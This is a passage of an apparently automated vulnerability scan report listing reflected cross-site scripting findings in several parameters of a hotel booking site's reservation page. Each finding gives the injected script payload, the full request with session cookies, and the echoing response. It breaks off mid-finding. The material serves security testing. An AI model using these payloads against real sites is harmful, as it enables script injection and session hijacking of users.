Date: Mon, 03 Oct 2011 00:33:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<!--

Diagnostic Information:
10/4a8493--><img src=a onerror=alert(1)>bf087f08db/2011 is an invalid date or time string. <br>
...[SNIP]...

4.280. https://www.hotelplanner.com/Accept/Reserve.cfm [arrivalMonth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the arrivalMonth request parameter is copied into an HTML comment. The payload 3267a--><img%20src%3da%20onerror%3dalert(1)>1be035142f8 was submitted in the arrivalMonth parameter. This input was echoed as 3267a--><img src=a onerror=alert(1)>1be035142f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=93267a--><img%20src%3da%20onerror%3dalert(1)>1be035142f8&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightl
...[SNIP]...

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:33:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<!--

Diagnostic Information:
The value 93267a--><img src=a onerror=alert(1)>1be035142f8 cannot be converted to a number. <br>
...[SNIP]...

4.281. https://www.hotelplanner.com/Accept/Reserve.cfm [arrivalYear parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the arrivalYear request parameter is copied into an HTML comment. The payload 4989e--><img%20src%3da%20onerror%3dalert(1)>16d875515cb was submitted in the arrivalYear parameter. This input was echoed as 4989e--><img src=a onerror=alert(1)>16d875515cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=20114989e--><img%20src%3da%20onerror%3dalert(1)>16d875515cb&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C4
...[SNIP]...

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:34:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<!--

Diagnostic Information:
10/4/20114989e--><img src=a onerror=alert(1)>16d875515cb is an invalid date or time string. <br>
...[SNIP]...

4.282. https://www.hotelplanner.com/Accept/Reserve.cfm [bedType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the bedType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60402"><script>alert(1)</script>90037396956 was submitted in the bedType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
geRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=1460402"><script>alert(1)</script>90037396956&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&roomTypeCode=200034536&rateCode=200205712&cancellationPolicy=We+understand+that+sometimes+plans+fa
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:08 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58859

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="bedType1" value="1460402"><script>alert(1)</script>90037396956">
...[SNIP]...

4.283. https://www.hotelplanner.com/Accept/Reserve.cfm [bedTypes parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the bedTypes request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb17d"><script>alert(1)</script>4c2a6b371af was submitted in the bedTypes parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
mediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bedeb17d"><script>alert(1)</script>4c2a6b371af&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&roomTypeCode=200034536&rateCode=200205712&cancellationPolicy=We+understand+that+sometim
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:04 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58910

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="bedTypes" value="14|King Bedeb17d"><script>alert(1)</script>4c2a6b371af">
...[SNIP]...

4.284. https://www.hotelplanner.com/Accept/Reserve.cfm [bedTypes parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the bedTypes request parameter is copied into the HTML document as plain text between tags. The payload 33d6d<script>alert(1)</script>79da41cdb8a was submitted in the bedTypes parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
mediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed33d6d<script>alert(1)</script>79da41cdb8a&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&roomTypeCode=200034536&rateCode=200205712&cancellationPolicy=We+understand+that+sometim
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:05 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58906

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<option selected value="14">King Bed33d6d<script>alert(1)</script>79da41cdb8a</option>
...[SNIP]...

4.285. https://www.hotelplanner.com/Accept/Reserve.cfm [cancellationPolicy parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the cancellationPolicy request parameter is copied into the HTML document as plain text between tags. The payload 78796<script>alert(1)</script>9d816f4ad0 was submitted in the cancellationPolicy parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
+after+4%3A00+PM+%28%28GMT-05%3A00%29+Eastern+Time+%28US+%26+Canada%29%29+on+Oct+3%2C+2011+are+subject+to+a+1+Night+Room+%26+Tax+penalty.+The+property+makes+no+refunds+for+no+shows+or+early+checkouts.78796<script>alert(1)</script>9d816f4ad0&hotelID=113791&HotelName=MILLENNIUM+BOSTONIAN+HOTEL+BOSTON&bookIt.x=100&bookIt.y=33

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:32 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58904

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
lations or changes made after 4:00 PM ((GMT-05:00) Eastern Time (US & Canada)) on Oct 3, 2011 are subject to a 1 Night Room & Tax penalty. The property makes no refunds for no shows or early checkouts.78796<script>alert(1)</script>9d816f4ad0</font>
...[SNIP]...

4.286. https://www.hotelplanner.com/Accept/Reserve.cfm [cancellationPolicy parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the cancellationPolicy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d91c7"><script>alert(1)</script>16f2b4b9db2 was submitted in the cancellationPolicy parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
+after+4%3A00+PM+%28%28GMT-05%3A00%29+Eastern+Time+%28US+%26+Canada%29%29+on+Oct+3%2C+2011+are+subject+to+a+1+Night+Room+%26+Tax+penalty.+The+property+makes+no+refunds+for+no+shows+or+early+checkouts.d91c7"><script>alert(1)</script>16f2b4b9db2&hotelID=113791&HotelName=MILLENNIUM+BOSTONIAN+HOTEL+BOSTON&bookIt.x=100&bookIt.y=33

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:30 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58910

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
lations or changes made after 4:00 PM ((GMT-05:00) Eastern Time (US & Canada)) on Oct 3, 2011 are subject to a 1 Night Room & Tax penalty. The property makes no refunds for no shows or early checkouts.d91c7"><script>alert(1)</script>16f2b4b9db2">
...[SNIP]...

4.287. https://www.hotelplanner.com/Accept/Reserve.cfm [chargeableRoomRateTaxesAndFees parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the chargeableRoomRateTaxesAndFees request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2848"><script>alert(1)</script>635379cc061 was submitted in the chargeableRoomRateTaxesAndFees parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99f2848"><script>alert(1)</script>635379cc061&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&prom
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:34:27 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58862

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="chargeableRoomRateTaxesAndFees" value="205.99f2848"><script>alert(1)</script>635379cc061">
...[SNIP]...

4.288. https://www.hotelplanner.com/Accept/Reserve.cfm [chargeableRoomRateTotal parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

